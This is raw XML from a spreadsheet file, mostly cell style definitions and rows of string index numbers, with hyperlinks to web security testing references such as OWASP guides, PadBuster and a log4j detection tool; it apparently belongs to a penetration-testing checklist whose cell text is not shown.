    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="3" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="4" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="5" xfId="0" applyFont="1"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7" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="9" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="6" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="5" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="5" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="6" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="4" xfId="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="4" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="4" xfId="0"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5" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="7" borderId="0" xfId="2" applyFont="1"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applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="32" fillId="8" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="32" fillId="8" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="1"/>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="9" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="9" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="9" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="9" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="9" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="9" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="9" borderId="6" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="9" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="9" borderId="3" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="9" borderId="0" xfId="1" applyFill="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="10" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="10" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="10" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="10" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="10" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="10" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="10" borderId="2" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="4" fillId="10" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="3">
    <cellStyle name="Hyperlink" xfId="1" builtinId="8"/>
    <cellStyle name="Neutral" xfId="2" builtinId="2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7BB6"/>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CC"/>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xploit-db.com/docs/40287.pdf" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GDSSecurity/PadBuster" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="../comments1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.tomanthony.co.uk/tools/bulk-http-header-compare/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.netcraft.com/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/takito1812/log4j-detect" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing1.vml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Error_Code_(OTG-ERR-001)" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings1.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_WebSockets_(OTG-CLIENT-010" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.usamav.dev/two-account-takeover-bugs-worth-4300-dollar-bount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250"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScaleNormal="100" workbookViewId="0">
      <pane ySplit="3" topLeftCell="A85" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="H86" sqref="H86"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="13.8"/>
  <cols>
    <col min="1" max="1" width="6" style="2" customWidth="1"/>
    <col min="2" max="2" width="15.109375" style="3" customWidth="1"/>
    <col min="3" max="3" width="31.44140625" style="4" customWidth="1"/>
    <col min="4" max="4" width="14" style="4" customWidth="1"/>
    <col min="5" max="5" width="65.21875" style="1" customWidth="1"/>
    <col min="6" max="6" width="13.6640625" style="1" customWidth="1"/>
    <col min="7" max="7" width="67.6640625" style="1" customWidth="1"/>
    <col min="8" max="8" width="35.6640625" style="1" customWidth="1"/>
    <col min="9" max="9" width="25" style="1" customWidth="1"/>
    <col min="10" max="10" width="53.6640625" style="1" customWidth="1"/>
    <col min="11" max="53" width="9" style="2"/>
    <col min="54" max="16384" width="9" style="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="2:10" ht="39" customHeight="1">
      <c r="C1" s="88" t="s">
        <v>0</v>
      </c>
      <c r="D1" s="88"/>
      <c r="E1" s="88"/>
      <c r="F1" s="88"/>
    </row>
    <row r="3" spans="2:10" ht="37.950000000000003" customHeight="1">
      <c r="B3" s="30" t="s">
        <v>1</v>
      </c>
      <c r="C3" s="30" t="s">
        <v>2</v>
      </c>
      <c r="D3" s="30" t="s">
        <v>3</v>
      </c>
      <c r="E3" s="30" t="s">
        <v>4</v>
      </c>
      <c r="F3" s="30" t="s">
        <v>5</v>
      </c>
      <c r="G3" s="30" t="s">
        <v>6</v>
      </c>
      <c r="H3" s="30" t="s">
        <v>7</v>
      </c>
      <c r="I3" s="30" t="s">
        <v>8</v>
      </c>
      <c r="J3" s="30" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="4" spans="2:10" ht="27.6">
      <c r="B4" s="7" t="s">
        <v>10</v>
      </c>
      <c r="C4" s="8"/>
      <c r="D4" s="8"/>
      <c r="E4" s="9"/>
      <c r="F4" s="9"/>
      <c r="G4" s="9"/>
      <c r="H4" s="9"/>
      <c r="I4" s="9"/>
      <c r="J4" s="9"/>
    </row>
    <row r="5" spans="2:10">
      <c r="B5" s="7"/>
      <c r="C5" s="8" t="s">
        <v>11</v>
      </c>
      <c r="D5" s="8"/>
      <c r="E5" s="9"/>
      <c r="F5" s="9" t="s">
        <v>12</v>
      </c>
      <c r="G5" s="9"/>
      <c r="H5" s="9"/>
      <c r="I5" s="9"/>
      <c r="J5" s="9"/>
    </row>
    <row r="6" spans="2:10" ht="26.7" customHeight="1">
      <c r="B6" s="7"/>
      <c r="C6" s="8" t="s">
        <v>13</v>
      </c>
      <c r="D6" s="8"/>
      <c r="E6" s="9"/>
      <c r="F6" s="9" t="s">
        <v>14</v>
      </c>
      <c r="G6" s="9"/>
      <c r="H6" s="9" t="s">
        <v>15</v>
      </c>
      <c r="I6" s="9"/>
      <c r="J6" s="9"/>
    </row>
    <row r="7" spans="2:10" hidden="1">
      <c r="B7" s="7"/>
      <c r="C7" s="8" t="s">
        <v>16</v>
      </c>
      <c r="D7" s="8"/>
      <c r="E7" s="9"/>
      <c r="F7" s="9" t="s">
        <v>17</v>
      </c>
      <c r="G7" s="9"/>
      <c r="H7" s="9"/>
      <c r="I7" s="9"/>
      <c r="J7" s="9"/>
    </row>
    <row r="8" spans="2:10" ht="27.6" hidden="1">
      <c r="B8" s="7"/>
      <c r="C8" s="8" t="s">
        <v>18</v>
      </c>
      <c r="D8" s="8"/>
      <c r="E8" s="9"/>
      <c r="F8" s="9" t="s">
        <v>19</v>
      </c>
      <c r="G8" s="9"/>
      <c r="H8" s="9"/>
      <c r="I8" s="9"/>
      <c r="J8" s="9"/>
    </row>
    <row r="9" spans="2:10" ht="18.45" hidden="1" customHeight="1">
      <c r="B9" s="7"/>
      <c r="C9" s="8" t="s">
        <v>20</v>
      </c>
      <c r="D9" s="8"/>
      <c r="E9" s="9"/>
      <c r="F9" s="9" t="s">
        <v>21</v>
      </c>
      <c r="G9" s="9"/>
      <c r="H9" s="9"/>
      <c r="I9" s="9"/>
      <c r="J9" s="9"/>
    </row>
    <row r="10" spans="2:10" ht="27.6" hidden="1">
      <c r="B10" s="7"/>
      <c r="C10" s="8" t="s">
        <v>22</v>
      </c>
      <c r="D10" s="8"/>
      <c r="E10" s="9"/>
      <c r="F10" s="9" t="s">
        <v>23</v>
      </c>
      <c r="G10" s="9"/>
      <c r="H10" s="9"/>
      <c r="I10" s="9"/>
      <c r="J10" s="9"/>
    </row>
    <row r="11" spans="2:10" hidden="1">
      <c r="B11" s="7"/>
      <c r="C11" s="8" t="s">
        <v>24</v>
      </c>
      <c r="D11" s="8"/>
      <c r="E11" s="9"/>
      <c r="F11" s="9" t="s">
        <v>25</v>
      </c>
      <c r="G11" s="9"/>
      <c r="H11" s="9"/>
      <c r="I11" s="9"/>
      <c r="J11" s="9"/>
    </row>
    <row r="12" spans="2:10">
      <c r="B12" s="7" t="s">
        <v>26</v>
      </c>
      <c r="C12" s="8"/>
      <c r="D12" s="8"/>
      <c r="E12" s="9"/>
      <c r="F12" s="9"/>
      <c r="G12" s="9"/>
      <c r="H12" s="9"/>
      <c r="I12" s="9"/>
      <c r="J12" s="9"/>
    </row>
    <row r="13" spans="2:10" ht="118.5" customHeight="1">
      <c r="B13" s="7"/>
      <c r="C13" s="8" t="s">
        <v>27</v>
      </c>
      <c r="D13" s="8"/>
      <c r="E13" s="9"/>
      <c r="F13" s="9" t="s">
        <v>28</v>
      </c>
      <c r="G13" s="9" t="s">
        <v>29</v>
      </c>
      <c r="H13" s="9"/>
      <c r="I13" s="9" t="s">
        <v>30</v>
      </c>
      <c r="J13" s="9"/>
    </row>
    <row r="14" spans="2:10" ht="118.8">
      <c r="B14" s="7"/>
      <c r="C14" s="8" t="s">
        <v>31</v>
      </c>
      <c r="D14" s="8"/>
      <c r="E14" s="9"/>
      <c r="F14" s="9" t="s">
        <v>32</v>
      </c>
      <c r="G14" s="9" t="s">
        <v>33</v>
      </c>
      <c r="H14" s="9"/>
      <c r="I14" s="9"/>
      <c r="J14" s="9"/>
    </row>
    <row r="15" spans="2:10" ht="79.2">
      <c r="B15" s="7"/>
      <c r="C15" s="8" t="s">
        <v>34</v>
      </c>
      <c r="D15" s="8"/>
      <c r="E15" s="9"/>
      <c r="F15" s="9" t="s">
        <v>35</v>
      </c>
      <c r="G15" s="9" t="s">
        <v>36</v>
      </c>
      <c r="H15" s="9"/>
      <c r="I15" s="9" t="s">
        <v>37</v>
      </c>
      <c r="J15" s="9"/>
    </row>
    <row r="16" spans="2:10" ht="27.6">
      <c r="B16" s="7" t="s">
        <v>38</v>
      </c>
      <c r="C16" s="8"/>
      <c r="D16" s="8"/>
      <c r="E16" s="9"/>
      <c r="F16" s="9"/>
      <c r="G16" s="9"/>
      <c r="H16" s="9"/>
      <c r="I16" s="9"/>
      <c r="J16" s="9"/>
    </row>
    <row r="17" spans="1:53">
      <c r="B17" s="7"/>
      <c r="C17" s="8" t="s">
        <v>38</v>
      </c>
      <c r="D17" s="8"/>
      <c r="E17" s="9"/>
      <c r="F17" s="9" t="s">
        <v>39</v>
      </c>
      <c r="G17" s="9"/>
      <c r="H17" s="9"/>
      <c r="I17" s="9"/>
      <c r="J17" s="9"/>
    </row>
    <row r="18" spans="1:53" ht="41.4">
      <c r="B18" s="7" t="s">
        <v>40</v>
      </c>
      <c r="C18" s="8"/>
      <c r="D18" s="8"/>
      <c r="E18" s="9"/>
      <c r="F18" s="9"/>
      <c r="G18" s="9"/>
      <c r="H18" s="9"/>
      <c r="I18" s="9"/>
      <c r="J18" s="9"/>
    </row>
    <row r="19" spans="1:53" ht="132">
      <c r="B19" s="7"/>
      <c r="C19" s="95" t="s">
        <v>41</v>
      </c>
      <c r="D19" s="8"/>
      <c r="E19" s="9" t="s">
        <v>529</v>
      </c>
      <c r="F19" s="9" t="s">
        <v>42</v>
      </c>
      <c r="G19" s="10" t="s">
        <v>43</v>
      </c>
      <c r="H19" s="9"/>
      <c r="I19" s="9"/>
      <c r="J19" s="9"/>
    </row>
    <row r="20" spans="1:53" s="69" customFormat="1" ht="79.2">
      <c r="B20" s="70"/>
      <c r="C20" s="95" t="s">
        <v>44</v>
      </c>
      <c r="D20" s="72"/>
      <c r="E20" s="71" t="s">
        <v>530</v>
      </c>
      <c r="F20" s="71"/>
      <c r="G20" s="71" t="s">
        <v>45</v>
      </c>
      <c r="H20" s="69" t="s">
        <v>46</v>
      </c>
      <c r="I20" s="71"/>
      <c r="J20" s="71"/>
    </row>
    <row r="21" spans="1:53" ht="138" customHeight="1">
      <c r="B21" s="7"/>
      <c r="C21" s="8" t="s">
        <v>47</v>
      </c>
      <c r="D21" s="8"/>
      <c r="E21" s="9" t="s">
        <v>551</v>
      </c>
      <c r="F21" s="9" t="s">
        <v>48</v>
      </c>
      <c r="G21" s="9" t="s">
        <v>524</v>
      </c>
      <c r="H21" s="1" t="s">
        <v>49</v>
      </c>
      <c r="I21" s="9"/>
      <c r="J21" s="10" t="s">
        <v>50</v>
      </c>
    </row>
    <row r="22" spans="1:53" ht="26.4">
      <c r="B22" s="7"/>
      <c r="C22" s="8" t="s">
        <v>51</v>
      </c>
      <c r="D22" s="8"/>
      <c r="E22" s="9" t="s">
        <v>525</v>
      </c>
      <c r="F22" s="9" t="s">
        <v>52</v>
      </c>
      <c r="G22" s="9" t="s">
        <v>53</v>
      </c>
      <c r="H22" s="9"/>
      <c r="I22" s="9"/>
      <c r="J22" s="9"/>
    </row>
    <row r="23" spans="1:53" ht="26.4">
      <c r="B23" s="7"/>
      <c r="C23" s="8" t="s">
        <v>54</v>
      </c>
      <c r="D23" s="8"/>
      <c r="E23" s="9" t="s">
        <v>531</v>
      </c>
      <c r="F23" s="9" t="s">
        <v>55</v>
      </c>
      <c r="G23" s="9" t="s">
        <v>56</v>
      </c>
      <c r="H23" s="9"/>
      <c r="I23" s="9"/>
      <c r="J23" s="9"/>
    </row>
    <row r="24" spans="1:53" ht="66">
      <c r="B24" s="7"/>
      <c r="C24" s="8" t="s">
        <v>57</v>
      </c>
      <c r="D24" s="8"/>
      <c r="E24" s="9" t="s">
        <v>552</v>
      </c>
      <c r="F24" s="9" t="s">
        <v>58</v>
      </c>
      <c r="G24" s="9" t="s">
        <v>59</v>
      </c>
      <c r="H24" s="9"/>
      <c r="I24" s="9"/>
      <c r="J24" s="9"/>
    </row>
    <row r="25" spans="1:53" ht="52.8" hidden="1">
      <c r="B25" s="7"/>
      <c r="C25" s="8" t="s">
        <v>60</v>
      </c>
      <c r="D25" s="8"/>
      <c r="E25" s="9"/>
      <c r="F25" s="9" t="s">
        <v>61</v>
      </c>
      <c r="G25" s="9" t="s">
        <v>62</v>
      </c>
      <c r="H25" s="9"/>
      <c r="I25" s="9"/>
      <c r="J25" s="9"/>
    </row>
    <row r="26" spans="1:53" ht="66">
      <c r="B26" s="7"/>
      <c r="C26" s="8" t="s">
        <v>63</v>
      </c>
      <c r="D26" s="8"/>
      <c r="E26" s="9" t="s">
        <v>532</v>
      </c>
      <c r="F26" s="9" t="s">
        <v>64</v>
      </c>
      <c r="G26" s="9" t="s">
        <v>65</v>
      </c>
      <c r="H26" s="9"/>
      <c r="I26" s="9"/>
      <c r="J26" s="9"/>
    </row>
    <row r="27" spans="1:53" ht="39.6">
      <c r="B27" s="7"/>
      <c r="C27" s="8" t="s">
        <v>66</v>
      </c>
      <c r="D27" s="8"/>
      <c r="E27" s="9" t="s">
        <v>553</v>
      </c>
      <c r="F27" s="9" t="s">
        <v>67</v>
      </c>
      <c r="G27" s="9" t="s">
        <v>68</v>
      </c>
      <c r="H27" s="9"/>
      <c r="I27" s="9"/>
      <c r="J27" s="9"/>
    </row>
    <row r="28" spans="1:53" s="4" customFormat="1" ht="82.8">
      <c r="A28" s="6"/>
      <c r="B28" s="58"/>
      <c r="C28" s="94" t="s">
        <v>69</v>
      </c>
      <c r="D28" s="8"/>
      <c r="E28" s="8" t="s">
        <v>533</v>
      </c>
      <c r="F28" s="59" t="s">
        <v>70</v>
      </c>
      <c r="G28" s="4" t="s">
        <v>71</v>
      </c>
      <c r="H28" s="4" t="s">
        <v>72</v>
      </c>
      <c r="I28" s="8"/>
      <c r="J28" s="8"/>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row>
    <row r="29" spans="1:53" ht="52.8">
      <c r="B29" s="7"/>
      <c r="C29" s="95" t="s">
        <v>73</v>
      </c>
      <c r="D29" s="8"/>
      <c r="E29" s="9" t="s">
        <v>554</v>
      </c>
      <c r="F29" s="9" t="s">
        <v>74</v>
      </c>
      <c r="G29" s="9" t="s">
        <v>75</v>
      </c>
      <c r="H29" s="9"/>
      <c r="I29" s="9"/>
      <c r="J29" s="9"/>
    </row>
    <row r="30" spans="1:53" ht="105.6">
      <c r="B30" s="7"/>
      <c r="C30" s="95" t="s">
        <v>76</v>
      </c>
      <c r="D30" s="8"/>
      <c r="E30" s="9" t="s">
        <v>534</v>
      </c>
      <c r="F30" s="9" t="s">
        <v>77</v>
      </c>
      <c r="G30" s="9" t="s">
        <v>78</v>
      </c>
      <c r="H30" s="9"/>
      <c r="I30" s="9"/>
      <c r="J30" s="9"/>
    </row>
    <row r="31" spans="1:53" ht="41.4">
      <c r="B31" s="7" t="s">
        <v>79</v>
      </c>
      <c r="C31" s="8"/>
      <c r="D31" s="8"/>
      <c r="E31" s="9"/>
      <c r="F31" s="9"/>
      <c r="G31" s="9"/>
      <c r="H31" s="9"/>
      <c r="I31" s="9"/>
      <c r="J31" s="9"/>
    </row>
    <row r="32" spans="1:53">
      <c r="B32" s="7"/>
      <c r="C32" s="8" t="s">
        <v>80</v>
      </c>
      <c r="D32" s="8"/>
      <c r="E32" s="9" t="s">
        <v>528</v>
      </c>
      <c r="F32" s="9" t="s">
        <v>81</v>
      </c>
      <c r="G32" s="9" t="s">
        <v>522</v>
      </c>
      <c r="H32" s="9"/>
      <c r="I32" s="9"/>
      <c r="J32" s="9"/>
    </row>
    <row r="33" spans="2:10" ht="118.8">
      <c r="B33" s="7"/>
      <c r="C33" s="95" t="s">
        <v>82</v>
      </c>
      <c r="D33" s="8"/>
      <c r="E33" s="9" t="s">
        <v>555</v>
      </c>
      <c r="F33" s="9" t="s">
        <v>83</v>
      </c>
      <c r="G33" s="11" t="s">
        <v>84</v>
      </c>
      <c r="H33" s="9"/>
      <c r="I33" s="9"/>
      <c r="J33" s="9"/>
    </row>
    <row r="34" spans="2:10" ht="67.95" customHeight="1">
      <c r="B34" s="7"/>
      <c r="C34" s="8" t="s">
        <v>85</v>
      </c>
      <c r="D34" s="8"/>
      <c r="E34" s="9" t="s">
        <v>535</v>
      </c>
      <c r="F34" s="9" t="s">
        <v>86</v>
      </c>
      <c r="G34" s="11" t="s">
        <v>87</v>
      </c>
      <c r="H34" s="9"/>
      <c r="I34" s="9"/>
      <c r="J34" s="9"/>
    </row>
    <row r="35" spans="2:10" ht="69">
      <c r="B35" s="7"/>
      <c r="C35" s="8" t="s">
        <v>88</v>
      </c>
      <c r="D35" s="8"/>
      <c r="E35" s="8" t="s">
        <v>536</v>
      </c>
      <c r="F35" s="9" t="s">
        <v>89</v>
      </c>
